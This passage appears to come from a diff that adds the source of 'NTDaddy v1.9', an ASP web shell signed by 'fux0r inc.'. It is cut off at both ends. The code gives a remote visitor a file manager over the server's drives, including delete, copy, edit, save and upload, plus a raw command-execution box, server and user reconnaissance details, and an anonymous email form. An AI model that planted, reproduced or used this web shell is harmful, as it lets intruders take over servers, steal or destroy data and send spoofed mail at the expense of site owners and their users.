+FolderAttributes = f1.attributes
+end select
+end if  
+response.write("<form name=frmFolderAttributes action=ntdaddy.asp method=post>")
+response.write("<input type=hidden name=FolderName Value=" & chr(34) & selFolder & chr(34) & ">")
+response.write("<input type=hidden name=FolderPath Value=" & chr(34) & FolderPath & chr(34) & ">")
+response.write("<center><Table border=5 cellpadding=3 cellspacing=1 bordercolor=#ffffff>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Folder Name: " & f.name & "</td>")
+response.write("<td rowspan=5><center><u><b>Set New Attributes:</b></u></center>")
+response.write("<input type=checkbox name=FolderAttribute1 value=0 checked>Normal")
+response.write("<br><input type=checkbox name=FolderAttribute2 value=1>Read Only")
+response.write("<br><input type=checkbox name=FolderAttribute3 value=2>Hidden")
+response.write("<br><input type=checkbox name=FolderAttribute4 value=4>System")
+response.write("<br><input type=checkbox name=FolderAttribute5 value=8>Volume")
+response.write("<br><input type=checkbox name=FolderAttribute6 value=16>Directory")
+response.write("<br><input type=checkbox name=FolderAttribute7 value=32>Archive")
+response.write("<br><input type=checkbox name=FolderAttribute8 value=64>Alias")
+response.write("<br><input type=checkbox name=FolderAttribute9 value=128>Compressed")
+response.write("<br><center><input type=submit name=cmdOption value=ApplyFolderAttributes></center>")
+response.write("</td></tr>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Type of Folder: " & f.type & "</td></tr>")
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Location: " & f.path)
+response.write("<br>Size: " & FormatNumber(f.size/1024, 2)  & "KB  (" & f.size & " bytes)</td></tr>")
+if f.DateCreated = "" then
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Created: ----")
+else
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Created: " & f.DateCreated)
+end if
+if f.DateLastAccessed = "" then
+response.write("<br>Modified: ----")
+else
+response.write("<br>Modified: " & f.DateLastAccessed)
+end if
+if f.DateLastModified = "" then
+response.write("<br>Accessed: ----</td></tr>")
+else
+response.write("<br>Accessed: " & f.DateLastModified & "</td></tr>")
+end if
+response.write("<tr><td bgcolor=#F8F8FF><font color=#000000>Attributes: " & FolderAttributes & "</td></tr>")
+response.write("</table></center></form>")
+case "OpenTextFile"
+If FilePath <> "" then
+lblioMode=Request.form("optiomode")
+lblFormat=request.form("optformat")
+set TextFile = fs.OpenTextFile (FilePath, lblioMode, lblFormat)
+TextOutput = TextFile.ReadAll   
+'TextOutput=""
+'Do While TextFile.AtEndOfStream <> True
+'       TextOutput = TextOutput & TextFile.ReadLine
+'Loop
+TextFile.close
+else
+FilePath = FolderPath
+end if
+response.write("<form name=frmTextFile action=ntdaddy.asp method=post>")
+response.write("<center><table border=5 cellspacing=1 cellpadding=3 bordercolor=#ffffff width=100% height=100% >")
+response.write("<tr><td bgcolor=#F8F8FF><input type=submit name=cmdtxtFileOption value=SaveAs><input type=text size=77 name=FileName value=" & chr(34) & FilePath & chr(34) & "><select name=optUnicode><option value=FALSE>ASCII <option value=TRUE>Unicode</select></td></tr>")
+response.write("<tr><td bgcolor=#ffffff><center><textarea name=txtFile rows=20 cols=85>" & TextOutput & "</textarea></center></td></tr>")
+response.write(chr(13))
+response.write(chr(13))
+response.write(chr(13))
+response.write(chr(13))
+response.write("<ERROR: THIS IS NOT A TEXT FILE>")
+response.write(chr(13))
+response.write("<FilePath: " & FilePath & ">")
+response.write(chr(13))
+response.write("<ioMode: " & lblioMode & ">")
+response.write(chr(13))
+response.write("<Format: " & lblFormat & ">")
+response.write(chr(13))
+response.write(chr(13))
+response.write(chr(13))
+response.write(chr(13))
+response.write("<tr><td><input type=hidden name=FolderPath Value=" & chr(34) & FolderPath & chr(34) & "></td></tr>")
+response.write("</table></center><p>") 
+case "ApplyFileAttributes"
+TempAtt=int(Request.form("FileAttribute1"))
+TempAtt=TempAtt + int(Request.form("FileAttribute2"))
+TempAtt=TempAtt + int(Request.form("FileAttribute3"))
+TempAtt=TempAtt + int(Request.form("FileAttribute4"))
+TempAtt=TempAtt + int(Request.form("FileAttribute5"))
+TempAtt=TempAtt + int(Request.form("FileAttribute6"))
+TempAtt=TempAtt + int(Request.form("FileAttribute7"))
+TempAtt=TempAtt + int(Request.form("FileAttribute8"))
+TempAtt=TempAtt + int(Request.form("FileAttribute9"))
+Set f = fs.GetFile(FilePath)
+f.attributes=int(TempAtt)
+response.write("File: " & FilePath & " attributes have been changed.")
+case "ApplyFolderAttributes"
+FolderPath=Request.form("RefreshFolderPath")
+TempAtt=int(Request.form("FolderAttribute1"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute2"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute3"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute4"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute5"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute6"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute7"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute8"))
+TempAtt=TempAtt + int(Request.form("FolderAttribute9"))
+Set f = fs.Getfolder(selFolder)
+f.attributes=int(TempAtt)
+response.write("Folder: " & selFolder & " attributes have been changed.")
+end select
+Select Case TextCmd
+case "SaveAs"
+TextWrite = Request.form("txtFile")
+TextCreateFormat = Request.form("optUnicode")
+if textcreateformat = "TRUE" then
+tempmsg="Unicode"
+else
+tempmsg="ASCII"
+end if
+Set TextFile = fs.CreateTextFile(FilePath, True,TextCreateFormat)
+TextFile.Write TextWrite
+TextFile.Close
+response.write("File: " & FilePath & " Format: " & tempmsg & " has been saved.")
+end select
+%>
+<%
+Public CurrentPath
+Function ShowDriveLetters()
+on error resume next
+Dim fs, d, dc, t
+dim isReadyColor,TempSize,ShowDriveInfo
+Set fs = CreateObject("Scripting.FileSystemObject")
+Set dc = fs.Drives
+ShowDriveInfo=Request.Form("chkShowDriveInfo")
+response.write("<form name=lstDrives action=ntdaddy.asp method=post>")
+response.write("<table border=5 cellspacing=1 cellpadding=3 bordercolor=#ffffff>")
+if showdriveinfo="TRUE" then
+response.write("<tr colspan=8><td align=center colspan=8 bgcolor=#F8F8FF><font color=#000000><input type=checkbox name=chkShowDriveInfo value=TRUE> Show Drive Info  </td></tr>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>File System</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Serial #</u><b></td>")
+else
+response.write("<tr colspan=2><td align=center colspan=2 bgcolor=#f8f8ff><font color=#000000><input type=checkbox name=chkShowDriveInfo value=TRUE>Show Drive Info</td></tr>")
+end if
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Type</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Drive</u><b></td>")
+if showdriveinfo="TRUE" then
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Volume Name</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Share Name</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Free Space</u><b></td>")
+response.write("<td align=center bgcolor=#f8f8ff><font color=#000000><b><u>Total Size</u><b></td>")
+end if
+response.write("</tr>")
+For Each d in dc
+Select Case d.DriveType
+Case 0: t = "Unknown"
+Case 1: t = "Removable"
+Case 2: t = "Fixed"
+Case 3: t = "Network"
+Case 4: t = "CD-ROM"
+Case 5: t = "RAM Disk"
+End Select
+if showdriveinfo="TRUE" then
+if d.isReady then
+response.write("<TR bgcolor=#000000>")
+else
+response.write("<TR bgcolor=#191970>")
+end if
+if d.filesystem = "" then
+response.write("<td align=center>....</td>")
+else
+response.write("<td align=center>" & d.filesystem & "</td>")
+end if
+if d.SerialNumber = "" then
+response.write("<td align=center>....</td>")
+else
+response.write("<td align=center>" & d.SerialNumber & "</td>")
+end if
+else
+response.write("<TR>")
+end if
+response.write("<td align=center>" & t & "</td>")
+response.write("<td align=center><input type=submit name=FolderPath value=" & d.driveletter & ":\></td>")
+if showdriveinfo="TRUE" then
+if d.volumename="" then
+response.write("<td align=center>....</td>")
+else
+response.write("<td align=center>" & d.volumename & "</td>")
+end if
+if d.sharename="" then
+response.write("<td align=center>....</td>")
+else
+response.write("<td align=center>" & d.sharename & "</td>")
+end if
+str=""
+str=str & d.driveletter
+str=str & ":"
+'response.write(str)
+if d.isready then
+freespace = (d.AvailableSpace / 1048576)
+set sp=fs.getdrive(str)
+response.write("<td align=center>" & Round(freespace,1) & " MB</td>")
+else
+response.write("<td align=center>....</td>")
+end if
+str=""
+str=str & d.driveletter
+str=str & ":"
+'response.write(str)
+if d.isready then
+totalspace = (d.TotalSize / 1048576)
+set sp=fs.getdrive(str)
+response.write("<td align=center>" & Round(totalspace,1) & " MB</td>")
+else
+response.write("<td align=center>....</td>")
+end if
+end if
+Next
+response.write("</tr>")
+response.write("</tr></table>")
+response.write("</form>")
+End Function
+Function ShowFolderNames()
+on error resume next
+Dim fs, f, f1, s, sf ,FP
+dim ShowFolderInfo,FolderAttributes 
+ShowFolderInfo=request.form("chkShowFolderInfo")
+FP=Request.Form("FolderPath")
+if FP = "RefreshFolder" or request.form("cmdOption")="DeleteFolder" or request.form("cmdOption")="CopyFolder" or request.form("cmdOption")="SetFolderAttributes" then
+FP=request.form("RefreshFolderPath")
+IP=chr(34) & IP & chr(34)
+end if
+CurrentPath=FP
+Set fs = CreateObject("Scripting.FileSystemObject")
+Set f = fs.GetFolder(FP)
+Set sf = f.SubFolders
+response.write("<form name=lstFolders action=ntdaddy.asp method=post>")
+response.write("<table border=5 cellspacing=1 cellpadding=3 bordercolor=#ffffff>")
+response.write("<tr colspan=10><td align=left colspan=10 bgcolor=#F8F8FF><font color=#000000><input type=Submit name=FolderPath value=RefreshFolder></td></tr>")
+response.write("<input type=hidden name=RefreshFolderPath value=" & chr(34) &  fp & chr(34) & ">")
+response.write("<tr colspan=10><td align=left colspan=10 bgcolor=#F8F8FF><font color=#000000><input type=checkbox name=chkShowFolderInfo value=TRUE> Show Folder Info</td></tr>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=DeleteFolder><br><input type=submit name=cmdOption Value=CopyFolder> to <input type=text name=CopyFolderTo></td></tr>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=SetFolderAttributes>")
+if showfolderinfo="TRUE" then
+response.write("<TR>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Folder</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Size</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Type</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Attributes</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Created</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Last Accessed</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Last Modified</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Short Name</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Short Path</u></b></td>")
+response.write("</tr>")
+end if
+For Each f1 in sf
+if showfolderinfo="TRUE" then
+response.write("<tr>")
+response.write("<td><input type=radio name=FolderName value=" & chr(34) & FP & f1.name & chr(34) & "><Input type=submit name=FolderPath value=" & chr(34) & FP & F1.name & "\" & chr(34) & "></td>")
+response.write("<td align=center nowrap>" & FormatNumber(f1.size/1024, 0)  & " kb</td>")
+response.write("<td align=center nowrap>" & f1.type & "</td>")
+folderattributes="...."
+select case f1.attributes
+case 0
+FolderAttributes = "Normal"
+case 1
+FolderAttributes = "Read Only"
+case 2
+FolderAttributes = "Hidden"
+case 3  'Extra
+FolderAttributes = "Read Only, Hidden"
+case 4
+FolderAttributes = "System"
+case 7  'Extra
+FolderAttributes = "Read Only, Hidden, System"
+case 8
+FolderAttributes = "Volume"
+case 16
+FolderAttributes = "Directory"
+case 17 'Extra
+FolderAttributes = "Read Only, Directory"
+case 18 'Extra
+FolderAttributes = "Hidden, Directory"
+case 19
+FolderAttributes = "Read Only, Hidden, Directoy"
+case 20 'Extra
+FolderAttributes = "System, Directory"
+case 22 'Extra
+FolderAttributes = "Hidden, System. Directory"
+case 23
+FolderAttributes = "Read Only, Hidden, System, Directory"
+case 32
+FolderAttributes = "Archive"
+case 33 'Extra
+FolderAttributes = "Read Only, Archive"
+case 34 'Extra
+FolderAttributes = "Hidden, Archive"
+case 38 'Extra
+FolderAttributes = "Hidden, Archive, System"
+case 39 'Extra
+FolderAttributes = "Read Only, Hidden, Archive, System"
+case 48 
+FolderAttributes = "Directory, Archive"
+case 64
+FolderAttributes = "Alias"
+case 128
+FolderAttributes = "Compressed"
+case else
+FolderAttributes = f1.attributes
+end select
+response.write("<td align=center nowrap>" & FolderAttributes & "</td>")
+if f1.datecreated = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datecreated & "</td>")
+end if
+if f1.datelastaccessed = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datelastaccessed & "</td>")
+end if
+if f1.datelastmodified = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datelastmodified & "</td>")
+end if
+response.write("<td align=center nowrap>" & f1.shortname & "</td>")
+response.write("<td align=center nowrap>" & f1.shortpath & "\</td></tr>")
+else
+response.write("<tr><td><input type=radio name=FolderName value=" & chr(34) & FP & f1.name & chr(34) & "><Input type=submit name=FolderPath value=" & chr(34) & FP & F1.name & "\" & chr(34) & "></td></tr>")
+end if
+Next
+response.write("</table>")
+response.write("</form>")
+End Function
+Function ShowFileNames()
+on error resume next
+Dim fs, f, f1, fc, FP
+dim ShowFileInfo,FileAttributes,ShowPrefix
+ShowPrefix=request.form("txtShowPrefix")
+ShowFileInfo=Request.form("chkShowFileInfo")
+FP=Request.Form("FolderPath")
+if FP = "RefreshFolder" or request.form("cmdOption")="DeleteFolder" or request.form("cmdOption")="CopyFolder" or request.form("cmdOption")="SetFolderAttributes" then
+FP=request.form("RefreshFolderPath")
+IP=chr(34) & IP & chr(34)
+end if
+CurrentPath=FP
+Set fs = CreateObject("Scripting.FileSystemObject")
+Set f = fs.GetFolder(FP)
+Set fc = f.Files
+response.write("<form name=lstFiles action=ntdaddy.asp method=post>")
+response.write("<table border=5 cellspacing=1 cellpadding=3 bordercolor=#ffffff>")
+response.write("<tr colspan=10><td align=left colspan=10 bgcolor=#F8F8FF><font color=#000000><input type=submit value=RefreshFiles> <input type=checkbox name=chkShowFileInfo value=TRUE> Show File Info &<br>Show Only:  <input type=text name=txtShowPrefix value= ></td></tr>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=DeleteFile><input type=submit name=cmdOption Value=CopyFile> to <input type=text name=CopyFileTo></td></tr>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=OpenTextFile><select name=optioMode><option value=" & chr(34) & "1" & chr(34) & ">For Reading <option value="& chr(34) & "2" & chr(34) & ">For Writing <option value=" & chr(34) & "8" & chr(34) & ">For Appending</select><select name=optformat><option value=" & chr(34) & "-2" & chr(34) & ">System Default <option value=" & chr(34) & "-1" & chr(34) & ">Unicode <option value=" & chr(34) & "0" & chr(34) & ">ASCII</select></td>")
+response.write("<tr colspan=10><td colspan=10 align=left bgcolor=#F8F8FF><font color=#000000><input type=submit name=cmdOption Value=SetFileAttributes>")
+response.write("<input type=hidden name=FolderPath Value=" & chr(34) & fp & chr(34) & "></tr>")
+if showfileinfo="TRUE" then
+response.write("<TR>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>File</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Size</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Type</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Attributes</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Created</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Last Accessed</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Last Modified</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Short Name</u></b></td>")
+response.write("<td align=center nowrap bgcolor=#ffffff><font color=#000000><b><u>Short Path</u></b></td>")
+response.write("</tr>")
+end if
+For Each f1 in fc
+if showfileinfo="TRUE" then
+if lcase(right(f1.name,(len(ShowPrefix)))) = lcase(ShowPrefix) then
+response.write("<tr>")
+response.write("<td align=center nowrap><input type=radio name=FileName value=" & chr(34) & FP & f1.name & chr(34) & ">" & f1.name & "</td>")
+response.write("<td align=center nowrap>" & FormatNumber(f1.size/1024, 0)  & " kb</td>")
+response.write("<td align=center nowrap>" & f1.type & "</td>")
+select case f1.attributes
+case 0
+FileAttributes = "Normal"
+case 1
+FileAttributes = "Read Only"
+case 2
+FileAttributes = "Hidden"
+case 3  'Extra
+FileAttributes = "Read Only, Hidden"
+case 4
+FileAttributes = "System"
+case 7  'Extra
+FileAttributes = "Read Only, Hidden, System"
+case 8
+FileAttributes = "Volume"
+case 16
+FileAttributes = "Directory"
+case 19
+FileAttributes = "Read Only, Hidden, Directoy"
+case 23
+FileAttributes = "Read Only, Hidden, System, Directory"
+case 32
+FileAttributes = "Archive"
+case 33 'Extra
+FileAttributes = "Read Only, Archive"
+case 34 'Extra
+FileAttributes = "Hidden, Archive"
+case 38 'Extra
+FileAttributes = "Hidden, Archive, System"
+case 39 'Extra
+FileAttributes = "Read Only, Hidden, Archive, System"
+case 48 
+FileAttributes = "Directory, Archive"
+case 64
+FileAttributes = "Alias"
+case 128
+FileAttributes = "Compressed"
+case else
+FileAttributes = f1.attributes
+end select
+response.write("<td align=center nowrap>" & FileAttributes & "</td>")
+if f1.datecreated = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datecreated & "</td>")
+end if
+if f1.datelastaccessed = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datelastaccessed & "</td>")
+end if
+if f1.datelastmodified = "" then
+response.write("<td align=center nowrap>....</td>")
+else
+response.write("<td align=center nowrap>" & f1.datelastmodified & "</td>")
+end if
+response.write("<td align=center nowrap>" & f1.shortname & "</td>")
+response.write("<td align=center nowrap>" & f1.shortpath & "</td></tr>")
+end if
+else
+if lcase(right(f1.name,(len(ShowPrefix)))) = lcase(ShowPrefix) then
+response.write("<tr><td><input type=radio name=FileName value=" & chr(34) & FP & f1.name & chr(34) & ">" & f1.name & "</td></tr>")
+end if
+end if
+Next
+response.write("</table>")
+response.write("</form>")
+End Function
+%>
+<STYLE>
+BODY
+{scrollbar-face-color: #f8f8ff; scrollbar-shadow-color: #cccccc;
+scrollbar-highlight-color: #cccccc; scrollbar-3dlight-color: #cccccc;
+scrollbar-darkshadow-color: #000000; scrollbar-track-color: #000000;
+scrollbar-arrow-color: #000000}
+</STYLE>
+</head>
+<body bgcolor=#000000 text=#ffffff>
+<center>
+<font size="18" color="#ffffff">NTDaddy | fux0r inc.</font>
+<hr color="#ffffff">
+<table border=1 width="100%" color="#fffff">
+<tr>
+<td align=center width=100% bgcolor=#ffffff><font color=#000000><a name=lblCurrentPath value=
+<% 
+FP=Request.Form("FolderPath")
+if FP = "RefreshFolder" or request.form("cmdOption")="DeleteFolder" or request.form("cmdOption")="CopyFolder" or request.form("cmdOption")="SetFolderAttributes" then
+FP=request.form("RefreshFolderPath")
+end if
+response.write(chr(34) & IP & chr(34) & ">" & FP)
+%>
+</a></td>
+</tr>
+</table>
+<table border=0 cellspacing=1 bordercolor="#ffffff" width=100% height=100%>
+<tr colspan=3><td align=left colspan=3><% =ShowDriveLetters() %></td>
+<td align=center></td></tr>
+<tr valign=top width=100%><td align=left><% =ShowFolderNames() %></td>
+<td align=right><% =ShowFileNames() %></td>
+</tr>
+</table>
+<br><hr color="#ffffff"><br>
+<table cellpadding="3" cellspacing="3" border="5" bordercolor="#ffffff">
+<tr>
+<td align="left" bgcolor="#F8F8FF">
+<font color="#000000" size="4"><b>• Remote Info.</b></font>
+</td>
+<td align="left" bgcolor="#F8F8FF">
+<font color="#000000" size="4"><b>• Local Info.</b></font>
+</td>
+</tr>
+<tr>
+<td align=left>
+<div align=left><font size="3">
+<b>User</b>: <%= "\\" & oScriptNet.ComputerName & " \ " & oScriptNet.UserName %> <br>
+<b>ID</b>: <%=request.servervariables("SERVER_NAME")%> <br>
+<b>IP</b>: <%=request.servervariables("LOCAL_ADDR")%> <br>
+<b>HTTPD</b>: <%=request.servervariables("SERVER_SOFTWARE")%> <b>Port</b>: <%=request.servervariables("SERVER_PORT")%> <br>
+<b>Webroot</b>: <%=request.servervariables("APPL_PHYSICAL_PATH")%> <br>
+<b>LogRoot</b>: <%=request.servervariables("APPL_MD_PATH")%> <br>
+<b>Date</b>: <% =date() %> <br>
+<b>Time</b>: <%=time() %> <br>
+<b>HTTPs</b>: <%=request.servervariables("HTTPS")%>
+<br></font></div>
+</td>
+<td align="left" valign="top">
+<b>Local Addr (What they see.)</b>: <%=request.servervariables("REMOTE_ADDR")%> <br>
+<b>Forwarded from</b> : <%=request.servervariables("HTTP_X_FORWARDED_FOR")%> <br>
+<b>Via</b>: <%=request.servervariables("HTTP_VIA")%> <br>
+<b>User Agent</b>: <%=request.servervariables("HTTP_USER_AGENT")%> <br>
+<b>Wookie</b>: <%=request.servervariables("HTTP_WOOKIE")%> <br>
+<b>Cache Control</b>: <%=request.servervariables("HTTP_CACHE_CONTROL")%> <br>
+<b>Interface</b>: <%=request.servervariables("GATEWAY_INTERFACE")%> <br>
+<b>Protocol</b>: <%=request.servervariables("SERVER_PROTOCOL")%> <br>
+<b>Method</b>: <%=request.servervariables("REQUEST_METHOD")%>
+</td>
+</tr>
+</table>
+<br>
+<hr color="#ffffff">
+<br>
+<table cellpadding="3" cellspacing"1" bordercolor="#F8F8FF" border=5>
+<tr>
+<td align="left" bgcolor="#F8F8FF">
+<font size="2" color="#000000"><b>• File Upload Utility</b></font></td>
+</tr>
+<tr>
+<td align="left">
+<form method=post ENCTYPE="multipart/form-data">
+<b>File</b> : <input type="file" size="35" name="File1"><br>
+<input type="submit" Name="Action" value="Upload the file">
+</form></td>
+</tr>
+<tr>
+<td align="left" bgcolor="#F8F8FF">
+<font size="2" color="#000000"><b>• RAW D.O.S. COMMAND INTERFACE</b></font></td>
+</tr>
+<tr valign="top">
+<td align="left">
+<form action="<%= Request.ServerVariables("URL") %>" method="POST">
+<p><input type="text" name=".CMD" size="45" value="<%= szCMD %>"> <input type="submit" value="Run"> </p>
+</form>
+<pre>
+<%
+If (IsObject(oFile)) Then
+On Error Resume Next
+Response.Write Server.HTMLEncode(oFile.ReadAll)
+oFile.Close
+Call oFileSys.DeleteFile(szTempFile, True)
+End If%>
+</pre>
+</td>
+</tr>
+</table>
+<br>
+<hr color="#ffffff">
+<br>
+<form action=ntdaddy.asp method=post>
+<form action=ntdaddy.asp method=post>
+<table border=3 cellpadding="3" cellspacing="2" bordercolor="#ffffff" width="400">
+<tr>
+<td bgcolor="#F8F8FF" colspan="2"><font color="#000000" align="left"><b>• Anonymous Email Utility</b></font></td>
+<tr>
+<td bgcolor="#F8F8FF"><font color="#000000"><b>From:</b></font> </td>
+<td><input name=From size=30 style="HEIGHT: 22px; WIDTH: 321px"></td></tr>
+<tr>
+<td bgcolor="#F8F8FF"><font color="#000000"><b>To:</b></font> </td>
+<td><input name=To size=30 style="HEIGHT: 22px; WIDTH: 321px"></td></tr>
+<tr>
+<td bgcolor="#F8F8FF"><font color="#000000"><b>Subject:</b></font> </td>
+<td><input name=Subject size=30 style="HEIGHT: 22px; WIDTH: 321px"></td></tr>
+<tr>
+<td valign="top" bgcolor="#F8F8FF"><font color="#000000"><b>Body:</b></font> </td>
+<td><textarea cols=30 name=Body rows=5 style="HEIGHT: 86px; WIDTH: 322px" wrap=virtual></textarea></td>
+</tr>
+<tr>
+<td align="right" bgcolor="#F8F8FF" colspan="2">
+<input type="submit" value="Send Mail">
+<input type="hidden" name="flag" value="1"></td>
+</tr>
+</table>
+<br>
+<hr color="#ffffff">
+<font size="#ffffff"><center>•[ <b>NTDaddy v1.9</b> ][ by obzerve ][ for the brothers of <b>fux0r inc.</b> 2k+1 ]•</b></center></font>
+</body>
+</html>
+<SCRIPT RUNAT=SERVER LANGUAGE=VBSCRIPT>
+Const IncludeType = 2 
+Dim UploadSizeLimit
+Function GetUpload()
+Dim Result
+Set Result = Nothing
+If Request.ServerVariables("REQUEST_METHOD") = "POST" Then 
+Dim CT, PosB, Boundary, Length, PosE
+CT = Request.ServerVariables("HTTP_Content_Type") 
+If LCase(Left(CT, 19)) = "multipart/form-data" Then 
+PosB = InStr(LCase(CT), "boundary=") 
+If PosB > 0 Then Boundary = Mid(CT, PosB + 9) 
+PosB = InStr(LCase(CT), "boundary=") 
+If PosB > 0 then 
+PosB = InStr(Boundary, ",")
+If PosB > 0 Then Boundary = Left(Boundary, PosB - 1)
+end if
+Length = CLng(Request.ServerVariables("HTTP_Content_Length")) 
+If "" & UploadSizeLimit <> "" Then
+UploadSizeLimit = CLng(UploadSizeLimit)
+If Length > UploadSizeLimit Then
+Request.BinaryRead (Length)
+Err.Raise 2, "GetUpload", "Upload size " & FormatNumber(Length, 0) & "B exceeds limit of " & FormatNumber(UploadSizeLimit, 0) & "B"
+Exit Function
+End If
+End If
+If Length > 0 And Boundary <> "" Then 
+Boundary = "--" & Boundary
+Dim Head, Binary
+Binary = Request.BinaryRead(Length) 
+Set Result = SeparateFields(Binary, Boundary)
+Binary = Empty 
+Else
+Err.Raise 10, "GetUpload", "Zero length request ."
+End If
+Else
+Err.Raise 11, "GetUpload", "No file sent."
+End If
+Else
+Err.Raise 1, "GetUpload", "Bad request method."
+End If
+Set GetUpload = Result
+End Function
+Function SeparateFields(Binary, Boundary)
+Dim PosOpenBoundary, PosCloseBoundary, PosEndOfHeader, isLastBoundary
+Dim Fields
+Boundary = StringToBinary(Boundary)
+PosOpenBoundary = InStrB(Binary, Boundary)
+PosCloseBoundary = InStrB(PosOpenBoundary + LenB(Boundary), Binary, Boundary, 0)
+Set Fields = CreateObject("Scripting.Dictionary")
+Do While (PosOpenBoundary > 0 And PosCloseBoundary > 0 And Not isLastBoundary)
+Dim HeaderContent, FieldContent, bFieldContent
+Dim Content_Disposition, FormFieldName, SourceFileName, Content_Type
+Dim Field, TwoCharsAfterEndBoundary
+PosEndOfHeader = InStrB(PosOpenBoundary + Len(Boundary), Binary, StringToBinary(vbCrLf + vbCrLf))
+HeaderContent = MidB(Binary, PosOpenBoundary + LenB(Boundary) + 2, PosEndOfHeader - PosOpenBoundary - LenB(Boundary) - 2)
+bFieldContent = MidB(Binary, (PosEndOfHeader + 4), PosCloseBoundary - (PosEndOfHeader + 4) - 2)
+GetHeadFields BinaryToString(HeaderContent), Content_Disposition, FormFieldName, SourceFileName, Content_Type
+Set Field = CreateUploadField() 
+Set FieldContent = CreateBinaryData()
+FieldContent.ByteArray = bFieldContent
+FieldContent.Length = LenB(bFieldContent)
+Field.Name = FormFieldName
+Field.ContentDisposition = Content_Disposition
+Field.FilePath = SourceFileName
+Field.FileName = GetFileName(SourceFileName)
+Field.ContentType = Content_Type
+Field.Length = FieldContent.Length
+Set Field.Value = FieldContent
+Fields.Add FormFieldName, Field
+TwoCharsAfterEndBoundary = BinaryToString(MidB(Binary, PosCloseBoundary + LenB(Boundary), 2))
+isLastBoundary = TwoCharsAfterEndBoundary = "--"
+If Not isLastBoundary Then 
+PosOpenBoundary = PosCloseBoundary
+PosCloseBoundary = InStrB(PosOpenBoundary + LenB(Boundary), Binary, Boundary)
+End If
+Loop
+Set SeparateFields = Fields
+End Function
+Function GetHeadFields(ByVal Head, Content_Disposition, Name, FileName, Content_Type)
+Content_Disposition = LTrim(SeparateField(Head, "content-disposition:", ";"))
+Name = (SeparateField(Head, "name=", ";")) 
+If Left(Name, 1) = """" Then Name = Mid(Name, 2, Len(Name) - 2)
+FileName = (SeparateField(Head, "filename=", ";")) 
+If Left(FileName, 1) = """" Then FileName = Mid(FileName, 2, Len(FileName) - 2)
+Content_Type = LTrim(SeparateField(Head, "content-type:", ";"))
+End Function
+Function SeparateField(From, ByVal sStart, ByVal sEnd)
+Dim PosB, PosE, sFrom
+sFrom = LCase(From)
+PosB = InStr(sFrom, sStart)
+If PosB > 0 Then
+PosB = PosB + Len(sStart)
+PosE = InStr(PosB, sFrom, sEnd)
+If PosE = 0 Then PosE = InStr(PosB, sFrom, vbCrLf)
+If PosE = 0 Then PosE = Len(sFrom) + 1
+SeparateField = Mid(From, PosB, PosE - PosB)
+Else
+SeparateField = Empty
+End If
+End Function
+Function GetFileName(FullPath)
+Dim Pos, PosF
+PosF = 0
+For Pos = Len(FullPath) To 1 Step -1
+Select Case Mid(FullPath, Pos, 1)
+Case "/", "\": PosF = Pos + 1: Pos = 0
+End Select
+Next
+If PosF = 0 Then PosF = 1
+GetFileName = Mid(FullPath, PosF)
+End Function
+Function BinaryToString(Binary)
+dim cl1, cl2, cl3, pl1, pl2, pl3
+Dim L
+cl1 = 1
+cl2 = 1
